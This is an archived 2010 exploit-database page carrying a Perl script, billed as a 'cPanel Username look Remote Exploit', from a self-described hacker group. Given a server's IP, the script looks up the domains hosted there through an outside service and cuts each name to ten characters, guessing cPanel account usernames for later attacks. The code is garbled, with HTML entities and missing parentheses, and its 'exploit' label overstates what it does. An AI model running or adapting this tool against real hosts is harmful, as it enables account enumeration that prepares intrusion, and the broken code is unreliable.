Home / os / win7

cPanel Username look Remote Exploit

Posted on 21 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>cPanel Username look Remote Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=================================== cPanel Username look Remote Exploit =================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_&lt;_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ &gt;&gt; Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #######################[In The Name Of God ]########################## #Exploit Title ? ? ? ?: ?cPanel Username look Remote Exploit #Author ? ? ? ? ? ? ? : ? PHC.IR #Contact ? ? ? ? ? ? ?: ?Net.Edit0r@Att.Net ? #Location ? ? ? ? ? ? : ?Iran #Code ? ? ? ? ? ? ? ? : ?[exploit code] ######################################################################## #!/usr/bin/perl ############################################# # Phc-Persian Hackerz Community-Security Team ########################################### use LWP::Simple; print &quot; **************************************************** cPanel Username look up Keep priv8 ? * **************************************************** * Phc-Persian Hackerz Community-Security Team * * ------------------------------------------- * * by PHC.IR ? ?&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; (Net.Edit0r ) * * ----------------------------------------------- * * Greetz to : admin ~ M.Prince ~ N20 ~ inj3ct0r * ****************************************************&quot;; print &quot; Target to look up -&gt; &quot;; chomp ($ip = &lt;&gt; ; print &quot;Output -&gt; &quot;; chomp ($out = &lt;&gt; ; print &quot; [~] Save &amp; Data .... &quot;; sleep(1); $URL = &quot;http://www.dedicatedornot.com/xml/&quot;.$ip; $content = get($URL); @name = split(/&lt;sites&gt;/,$content); $name = @name[1]; @name = split(/&lt;/sites&gt;/,$name); $name = @name[0]; $name =~ s/&lt;site&gt;//g; $name =~ s/&lt;/site&gt;//g; $name =~ s/www^.//g; $name =~ s/^.com//g; $name =~ s/^s+//g; open(IP,&quot;&gt;site.txt&quot; ; print IP &quot;$name&quot;; close(IP); sleep(1); print &quot;[~] Parsing Data ... &quot;; chomp ($data_file = &quot;site.txt&quot; ; sleep(1); open(DAT, $data_file) || die(&quot;Could not open file!&quot; ; @raw_data=&lt;DAT&gt;;? foreach $res (@raw_data) { chomp($res); $line=$res; my $new_line = ?substr( $line, 0,10); #my $new_line=$line; $new_line =~ s/.//g; $new_line =~ s/^s+//g; ? open(DA, &quot;&gt;&gt;$out&quot; || print &quot;Can't Open File. Try chmod 777 directory&lt;br&gt;&lt;br&gt;&quot;; print DA &quot;$new_line &quot;; close(DA); } open(add,&quot;&gt;&gt;$out&quot; ;print add &quot;Tnx to Net.Edit0r&quot;;close(add); print &quot;[~] Done . &quot; ######################################################################## #Greetz : admin ~ M.Prince ~ N20 ~ inj3ct0r ~ AGT ~ H4M3D ~ reglight #Note : IRANIAN ?HackerZ ######################################################################## #www.phc.ir (Phc-Persian Hackerz Community-Security Team) ###########################[Net.Edit0r]################################# # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-21]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP